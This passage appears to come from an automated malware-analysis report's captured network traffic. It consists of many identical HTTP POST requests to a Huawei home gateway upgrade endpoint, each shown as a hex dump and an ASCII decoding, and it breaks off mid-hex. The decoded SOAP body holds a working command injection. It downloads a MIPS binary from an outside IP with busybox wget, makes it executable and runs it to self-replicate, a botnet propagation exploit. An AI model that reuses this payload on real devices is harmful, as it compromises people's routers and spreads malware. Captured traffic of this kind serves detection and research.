2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 